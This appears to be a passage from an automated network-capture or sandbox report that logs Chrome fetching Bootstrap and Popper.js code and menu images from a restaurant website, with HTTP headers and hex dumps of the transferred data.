                                                                                                                                                    Data Ascii: /*! * Bootstrap v4.3.1 (https://getbootstrap.com/) * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */(function (globa
                                                                                                                                                    2024-10-01 04:26:31 UTC5499INData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 20 2a 20 43 6f 6e 73 74 61 6e 74 73 0a 20 20 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 20 2a 2f 0a 0a 20 20 76 61 72 20 4e 41 4d 45 24 32 20 3d 20 27 63 61 72 6f 75 73 65 6c 27 3b 0a 20 20 76 61 72 20 56 45 52 53 49 4f 4e 24 32 20 3d 20 27 34 2e 33 2e 31 27 3b 0a 20 20 76 61 72 20 44 41 54 41 5f 4b 45 59 24 32 20 3d 20 27 62 73 2e 63 61 72 6f 75 73 65 6c 27 3b 0a 20 20 76 61 72 20 45 56 45 4e 54 5f 4b 45 59 24 32 20 3d 20 22 2e 22 20 2b 20 44 41 54
                                                                                                                                                    Data Ascii: ------------------------------------- * Constants * ------------------------------------------------------------------------ */ var NAME$2 = 'carousel'; var VERSION$2 = '4.3.1'; var DATA_KEY$2 = 'bs.carousel'; var EVENT_KEY$2 = "." + DAT
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: 6c 6c 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 20 3d 20 6e 75 6c 6c 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 20 3d 20 6e 75 6c 6c 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 20 3d 20 6e 75 6c 6c 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 20 3d 20 6e 75 6c 6c 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 20 3d 20 6e 75 6c 6c 3b 0a 20 20 20 20 7d 20 2f 2f 20 50 72 69 76 61 74 65 0a 20 20 20 20 3b 0a 0a 20 20 20 20 5f 70 72 6f 74 6f 2e 5f 67 65 74 43 6f 6e 66 69 67 20 3d 20 66 75 6e 63 74 69 6f 6e 20 5f 67 65 74 43 6f 6e 66 69 67 28 63 6f 6e 66 69 67 29 20 7b 0a 20 20 20 20 20 20 63 6f 6e 66 69 67 20
                                                                                                                                                    Data Ascii: ll; this._interval = null; this._isPaused = null; this._isSliding = null; this._activeElement = null; this._indicatorsElement = null; } // Private ; _proto._getConfig = function _getConfig(config) { config
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: 76 65 73 29 2e 64 61 74 61 28 44 41 54 41 5f 4b 45 59 24 33 2c 20 6e 75 6c 6c 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 76 61 72 20 64 69 6d 65 6e 73 69 6f 6e 20 3d 20 74 68 69 73 2e 5f 67 65 74 44 69 6d 65 6e 73 69 6f 6e 28 29 3b 0a 0a 20 20 20 20 20 20 24 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 43 6c 61 73 73 4e 61 6d 65 24 33 2e 43 4f 4c 4c 41 50 53 45 29 2e 61 64 64 43 6c 61 73 73 28 43 6c 61 73 73 4e 61 6d 65 24 33 2e 43 4f 4c 4c 41 50 53 49 4e 47 29 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 74 79 6c 65 5b 64 69 6d 65 6e 73 69 6f 6e 5d 20 3d 20 30 3b 0a 0a 20 20 20 20 20 20 69 66 20 28 74 68 69 73 2e 5f 74 72 69 67 67 65 72 41 72 72 61 79
                                                                                                                                                    Data Ascii: ves).data(DATA_KEY$3, null); } } var dimension = this._getDimension(); $(this._element).removeClass(ClassName$3.COLLAPSE).addClass(ClassName$3.COLLAPSING); this._element.style[dimension] = 0; if (this._triggerArray
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: 20 7c 7c 20 68 74 6d 6c 3b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 73 63 72 6f 6c 6c 69 6e 67 45 6c 65 6d 65 6e 74 5b 75 70 70 65 72 53 69 64 65 5d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 72 65 74 75 72 6e 20 65 6c 65 6d 65 6e 74 5b 75 70 70 65 72 53 69 64 65 5d 3b 0a 20 20 7d 0a 0a 20 20 2f 2a 0a 20 20 20 2a 20 53 75 6d 20 6f 72 20 73 75 62 74 72 61 63 74 20 74 68 65 20 65 6c 65 6d 65 6e 74 20 73 63 72 6f 6c 6c 20 76 61 6c 75 65 73 20 28 6c 65 66 74 20 61 6e 64 20 74 6f 70 29 20 66 72 6f 6d 20 61 20 67 69 76 65 6e 20 72 65 63 74 20 6f 62 6a 65 63 74 0a 20 20 20 2a 20 40 6d 65 74 68 6f 64 0a 20 20 20 2a 20 40 6d 65 6d 62 65 72 6f 66 20 50 6f 70 70 65 72 2e 55 74 69 6c 73 0a 20 20 20 2a 20 40 70 61 72 61 6d 20 7b 4f 62 6a 65 63 74 7d 20 72 65 63 74 20 2d
                                                                                                                                                    Data Ascii: || html; return scrollingElement[upperSide]; } return element[upperSide]; } /* * Sum or subtract the element scroll values (left and top) from a given rect object * @method * @memberof Popper.Utils * @param {Object} rect -
                                                                                                                                                    2024-10-01 04:26:31 UTC16331INData Raw: 2a 2f 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67 65 74 4f 70 70 6f 73 69 74 65 50 6c 61 63 65 6d 65 6e 74 28 70 6c 61 63 65 6d 65 6e 74 29 20 7b 0a 20 20 20 20 76 61 72 20 68 61 73 68 20 3d 20 7b 20 6c 65 66 74 3a 20 27 72 69 67 68 74 27 2c 20 72 69 67 68 74 3a 20 27 6c 65 66 74 27 2c 20 62 6f 74 74 6f 6d 3a 20 27 74 6f 70 27 2c 20 74 6f 70 3a 20 27 62 6f 74 74 6f 6d 27 20 7d 3b 0a 20 20 20 20 72 65 74 75 72 6e 20 70 6c 61 63 65 6d 65 6e 74 2e 72 65 70 6c 61 63 65 28 2f 6c 65 66 74 7c 72 69 67 68 74 7c 62 6f 74 74 6f 6d 7c 74 6f 70 2f 67 2c 20 66 75 6e 63 74 69 6f 6e 20 28 6d 61 74 63 68 65 64 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 68 61 73 68 5b 6d 61 74 63 68 65 64 5d 3b 0a 20 20 20 20 7d 29 3b 0a 20 20 7d 0a 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20
                                                                                                                                                    Data Ascii: */ function getOppositePlacement(placement) { var hash = { left: 'right', right: 'left', bottom: 'top', top: 'bottom' }; return placement.replace(/left|right|bottom|top/g, function (matched) { return hash[matched]; }); } /** *
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: 20 20 6c 65 66 74 3a 20 68 6f 72 69 7a 6f 6e 74 61 6c 54 6f 49 6e 74 65 67 65 72 28 62 6f 74 68 4f 64 64 57 69 64 74 68 20 26 26 20 21 69 73 56 61 72 69 61 74 69 6f 6e 20 26 26 20 73 68 6f 75 6c 64 52 6f 75 6e 64 20 3f 20 70 6f 70 70 65 72 2e 6c 65 66 74 20 2d 20 31 20 3a 20 70 6f 70 70 65 72 2e 6c 65 66 74 29 2c 0a 20 20 20 20 20 20 74 6f 70 3a 20 76 65 72 74 69 63 61 6c 54 6f 49 6e 74 65 67 65 72 28 70 6f 70 70 65 72 2e 74 6f 70 29 2c 0a 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 76 65 72 74 69 63 61 6c 54 6f 49 6e 74 65 67 65 72 28 70 6f 70 70 65 72 2e 62 6f 74 74 6f 6d 29 2c 0a 20 20 20 20 20 20 72 69 67 68 74 3a 20 68 6f 72 69 7a 6f 6e 74 61 6c 54 6f 49 6e 74 65 67 65 72 28 70 6f 70 70 65 72 2e 72 69 67 68 74 29 0a 20 20 20 20 7d 3b 0a 20 20 7d 0a 0a
                                                                                                                                                    Data Ascii: left: horizontalToInteger(bothOddWidth && !isVariation && shouldRound ? popper.left - 1 : popper.left), top: verticalToInteger(popper.top), bottom: verticalToInteger(popper.bottom), right: horizontalToInteger(popper.right) }; }
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: 0a 20 20 20 20 76 61 72 20 76 61 6c 75 65 20 3d 20 2b 73 70 6c 69 74 5b 31 5d 3b 0a 20 20 20 20 76 61 72 20 75 6e 69 74 20 3d 20 73 70 6c 69 74 5b 32 5d 3b 0a 0a 20 20 20 20 2f 2f 20 49 66 20 69 74 27 73 20 6e 6f 74 20 61 20 6e 75 6d 62 65 72 20 69 74 27 73 20 61 6e 20 6f 70 65 72 61 74 6f 72 2c 20 49 20 67 75 65 73 73 0a 20 20 20 20 69 66 20 28 21 76 61 6c 75 65 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 73 74 72 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 69 66 20 28 75 6e 69 74 2e 69 6e 64 65 78 4f 66 28 27 25 27 29 20 3d 3d 3d 20 30 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 65 6c 65 6d 65 6e 74 20 3d 20 76 6f 69 64 20 30 3b 0a 20 20 20 20 20 20 73 77 69 74 63 68 20 28 75 6e 69 74 29 20 7b 0a 20 20 20 20 20 20 20 20 63 61 73 65 20 27 25 70 27 3a 0a
                                                                                                                                                    Data Ascii: var value = +split[1]; var unit = split[2]; // If it's not a number it's an operator, I guess if (!value) { return str; } if (unit.indexOf('%') === 0) { var element = void 0; switch (unit) { case '%p':
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: 69 73 74 61 6e 63 65 20 62 65 74 77 65 65 6e 20 74 68 65 20 62 6f 75 6e 64 61 72 69 65 73 0a 20 20 20 20 20 20 20 2a 20 61 6e 64 20 74 68 65 20 70 6f 70 70 65 72 2e 20 54 68 69 73 20 6d 61 6b 65 73 20 73 75 72 65 20 74 68 65 20 70 6f 70 70 65 72 20 61 6c 77 61 79 73 20 68 61 73 20 61 20 6c 69 74 74 6c 65 20 70 61 64 64 69 6e 67 0a 20 20 20 20 20 20 20 2a 20 62 65 74 77 65 65 6e 20 74 68 65 20 65 64 67 65 73 20 6f 66 20 69 74 73 20 63 6f 6e 74 61 69 6e 65 72 0a 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 35 2c 0a 20 20 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 2a 20 40 70 72 6f 70 20 7b 53 74 72 69 6e 67 7c 48 54 4d 4c 45 6c 65 6d 65 6e 74 7d 20 62 6f 75 6e 64 61 72 69 65 73 45 6c 65 6d 65 6e 74 3d 27 73 63 72 6f 6c 6c 50
                                                                                                                                                    Data Ascii: istance between the boundaries * and the popper. This makes sure the popper always has a little padding * between the edges of its container */ padding: 5, /** * @prop {String|HTMLElement} boundariesElement='scrollP
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: 67 65 74 74 65 72 20 74 68 61 74 20 77 69 6c 6c 20 72 65 74 75 72 6e 20 74 68 65 20 77 69 64 74 68 20 6f 66 20 74 68 65 20 76 69 72 74 75 61 6c 20 72 65 66 65 72 65 6e 63 65 20 65 6c 65 6d 65 6e 74 2e 0a 20 20 20 2a 20 40 70 72 6f 70 65 72 74 79 20 7b 6e 75 6d 62 65 72 7d 20 64 61 74 61 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 0a 20 20 20 2a 20 41 6e 20 45 53 36 20 67 65 74 74 65 72 20 74 68 61 74 20 77 69 6c 6c 20 72 65 74 75 72 6e 20 74 68 65 20 68 65 69 67 68 74 20 6f 66 20 74 68 65 20 76 69 72 74 75 61 6c 20 72 65 66 65 72 65 6e 63 65 20 65 6c 65 6d 65 6e 74 2e 0a 20 20 20 2a 2f 0a 0a 0a 20 20 50 6f 70 70 65 72 2e 55 74 69 6c 73 20 3d 20 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 3f 20 77 69 6e 64 6f 77
                                                                                                                                                    Data Ascii: getter that will return the width of the virtual reference element. * @property {number} data.clientHeight * An ES6 getter that will return the height of the virtual reference element. */ Popper.Utils = (typeof window !== 'undefined' ? window


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    38192.168.2.449787162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:31 UTC377OUTGET /assets/imgs/icon2.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:31 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:31 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 23636
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:31 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:31 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5e 00 00 00 64 08 06 00 00 00 0f 33 87 a5 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 38 25 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR^d3pHYs8%iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:31 UTC5499INData Raw: 1c a9 aa 4a 9a a6 91 db e5 a2 c1 c1 c1 45 f0 14 8d 46 ef 0b 47 22 4f 28 aa ea 57 15 05 b2 a2 40 94 e4 29 de cf af e1 bc dc fd c1 40 80 dc 6e f7 2a 78 bb dd 4e a6 b9 39 f2 f1 fc 67 7d 3e df 5a 41 88 4e dc 6c f8 19 63 d5 00 fe 0e c0 83 4b c1 ab aa 4a 5e 2f 47 63 86 31 f2 78 3c b1 52 83 cf ef 27 3e c0 ef 95 24 51 57 d4 79 3f 2e cb 8a c1 e7 f3 fe bf 00 cf af 82 5f 0a 3e 18 0e d3 ec ec 2c cd cc cc 7c 8b 0f f0 6f aa aa aa df cc 1f 40 82 a2 28 0f 79 3c 9e 18 78 8f c7 4d 26 f3 1c f9 79 9e 74 5d 27 51 94 28 10 0c d2 94 71 ea 53 76 a7 23 43 67 cc 15 8b f3 15 65 2e 14 0c fe ab cb e5 22 c3 d8 d8 fb 06 de eb e3 68 92 9b 20 17 ef f8 68 82 37 99 4c 64 b5 59 69 68 68 f0 4b 43 43 43 87 42 a1 90 eb 96 a4 4b 55 4f fa 7c be ef 29 8a f2 c0 22 78 ab cd 4a c6 85 d5 02 aa aa 52
                                                                                                                                                    Data Ascii: JEFG"O(W@)@n*xN9g}>ZANlcKJ^/Gc1x<R'>$QWy?._>,|o@(y<xM&yt]'Q(qSv#Cge."h h7LdYihhKCCCBKUO|)"xJR
                                                                                                                                                    2024-10-01 04:26:31 UTC2105INData Raw: c3 f9 f3 e7 51 52 52 82 9a 9a 1a 14 17 17 63 c7 8e 1d d8 be 7d 3b d6 ad 5b 87 df fe 76 1d 7e f6 f3 9f e3 d5 4d 9b e0 72 b9 62 c9 e0 62 e8 78 b3 3d 7f 77 83 75 47 05 e1 3b 82 20 7c fd 4e c1 7f 15 40 0f de e7 e1 f7 fb 63 b6 f3 ca 95 2b 18 1a 1a 5a 16 9a 86 42 21 0c 0e 0e e2 d2 a5 4b d8 bb 77 2f 0e 1d 3a 84 c2 c2 42 14 14 14 20 35 35 15 eb d7 af 47 72 72 32 6a 6b 6b 63 60 25 49 42 76 76 36 7e fc e3 1f e3 85 17 5e c0 ae 5d bb 90 93 93 83 8b 17 2f 22 14 0a c1 e3 f1 a0 b7 b7 17 2d 2d 2d b8 76 ed 1a ba ba ba 70 e6 cc 19 d4 d7 d7 a3 b9 b9 19 ad ad ad 18 1e 19 c6 e4 d4 24 42 a1 d0 fb 78 b7 0c ba ae d6 2a 8a f2 15 45 51 fe 88 a2 92 78 27 f2 7b 51 39 5a a0 33 1d 1f e4 d0 34 0d 91 48 04 92 24 c1 6a b5 c2 60 30 60 72 72 12 e3 e3 e3 e8 eb eb 43 73 73 33 1a 1a 1a 30 34
                                                                                                                                                    Data Ascii: QRRc};[v~Mrbbx=wuG; |N@c+ZB!Kw/:B 55Grr2jkkc`%IBvv6~^]/"---vp$Bx*EQx'{Q9Z34H$j`0`rrCss304


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    39192.168.2.449789162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:31 UTC639OUTGET /assets/imgs/special-menu-1.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:31 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:31 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:26 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 57952
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:31 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:31 UTC16031INData Raw: ff d8 ff e1 21 4d 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 02 e3 00 00 01 01 00 03 00 00 00 01 01 9f 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 31 38 3a 31 32 3a 33 30 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: !MExifMM*(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:26 18:12:30
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: ff 00 e5 b9 4f 04 e3 3b 24 d5 8f 8c f6 5f 5e a5 c1 cd 68 1b 41 7f 1b 7f b2 9a 62 78 3a fa 75 15 5c 37 fd 66 d8 02 27 70 07 9b d1 62 66 62 53 8c 36 34 b7 a8 51 b5 ad b5 f0 76 ed 8f 56 bf 47 76 d7 55 6b 43 58 fb 54 72 2c 76 41 b1 95 96 b6 bb 5f be 8b 01 90 d7 91 f4 6d 6b bd fe 86 e7 b9 bb d5 13 73 2d dc 48 0c c8 ac 06 3c 82 27 40 1d 0f fe ae ef dd f6 7f c5 a5 8d d3 b3 5a 3e dd 5d e0 b5 d2 e3 53 c3 81 83 f9 ad d3 6b f7 fd 26 7e 62 84 0e fa 56 c0 a6 a3 13 c5 7f 31 de ed 07 5d c2 17 53 8d 95 4d 6d 65 d6 fa 34 dd 58 6f e9 05 b2 e6 3a d7 6d f6 bb 77 b7 fa e9 ef e8 f7 1c ec 6f ab 8d 73 1b 7b 5c f3 63 f7 7b 1d 6c fb 7d f1 f4 7d 43 bf e8 7f c1 a3 d5 7d ae ea 7d 38 64 3a 6a 19 15 ba c3 10 23 73 1c cd d0 84 72 2e 1f 59 c3 9b b9 d7 1c 92 d7 fb 75 69 f5 7d 2f e5 3f d2
                                                                                                                                                    Data Ascii: O;$_^hAbx:u\7f'pbfbS64QvVGvUkCXTr,vA_mks-H<'@Z>]Sk&~bV1]SMme4Xo:mwos{\c{l}}C}}8d:j#sr.Yui}/?
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: 9d a2 fe aa e9 a1 d7 7f 39 d3 de bb 72 b2 7f af bf 78 b2 5c 92 69 a2 9e eb b7 ab af b2 0d 99 69 97 cb 8f 35 79 7e c9 7c 98 aa 85 1c 9d 35 b6 2b 12 c6 a6 47 f1 81 b1 08 c2 70 0d 91 18 22 c2 a6 a7 42 04 a5 8e 2a 1d c7 e0 44 46 43 e5 ba 1a e2 2a 60 17 96 6e 26 45 42 cb 67 78 7e 06 03 80 ec 8c 19 6c ee 6e c2 92 5a 15 bf 8f a1 15 2e b2 9c 31 34 96 12 09 3e d7 52 56 cf 5e b3 e0 8e 24 48 62 64 8d 44 7c d7 49 82 48 f3 f6 5c 2a 82 49 e5 48 a2 ec ec 56 be f5 7b 68 23 af 63 b3 af 3a dc ad 62 cd 88 a1 90 dc ed 9a 47 cf bf eb 9e 6e c2 e4 42 fc f6 2f ac 1d 6d a6 47 2d 23 80 06 26 02 d3 49 e4 66 ce 03 8a de 54 ec 0f c8 f2 b2 2e 4e 70 c4 18 34 40 60 07 71 44 d9 d7 42 d2 58 44 11 24 1e 08 d9 c7 02 38 64 8f 96 4b 11 43 b2 70 66 c0 c1 17 ea 06 00 18 4f 5a 22 64 30 43 97 7b
                                                                                                                                                    Data Ascii: 9rx\ii5y~|5+Gp"B*DFC*`n&EBgx~lnZ.14>RV^$HbdD|IH\*IHV{h#c:bGnB/mG-#&IfT.Np4@`qDBXD$8dKCpfOZ"d0C{
                                                                                                                                                    2024-10-01 04:26:31 UTC9153INData Raw: 84 72 51 a7 20 75 52 c3 db 46 dc 6f cb 10 a5 97 ea 21 8a 33 88 63 a0 2a d2 68 17 54 65 e6 95 0a 86 29 97 6a c2 63 50 50 8e 41 5d e4 78 21 3e da 42 e8 97 31 3a 15 77 7d 28 80 3d 90 1e d7 44 63 30 94 63 43 e4 56 91 52 84 a2 1a 5b 84 65 8f 23 44 6c 8f 4e 40 b6 e8 63 31 04 03 5c 8c 88 88 02 2c f5 e2 a3 db 4d a5 0c 5c f0 03 48 92 80 98 37 0d 65 ba be 19 3f 53 ed 51 c5 9c 59 1d 5f 62 51 b7 6d 11 89 93 46 5e e0 a3 32 5e 11 14 28 5b a1 28 6f 09 52 40 70 51 c9 8e 62 50 ee 40 63 b8 23 ef 4e 35 5a 85 69 3a 2d 57 92 d1 55 31 54 f1 64 73 62 1f ab 8b 98 10 a1 0f ae ee 61 e6 b1 63 d1 a2 1f d5 51 3e ea 71 80 ba 44 50 2c 79 f1 66 8c e5 90 99 48 35 62 47 d3 30 a5 9b 3e 31 2c 99 2a 46 30 d1 3f e8 58 f2 62 81 c7 da 96 39 43 b9 75 1c dd ac ee ed ad 12 20 ed 25 3c 57 72 33 da
                                                                                                                                                    Data Ascii: rQ uRFo!3c*hTe)jcPPA]x!>B1:w}(=Dc0cCVR[e#DlN@c1\,M\H7e?SQY_bQmF^2^([(oR@pQbP@c#N5Zi:-WU1TdsbacQ>qDP,yfH5bG0>1,*F0?Xb9Cu %<Wr3


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    40192.168.2.449790162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:31 UTC639OUTGET /assets/imgs/special-menu-2.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:31 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:31 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 80908
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:31 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
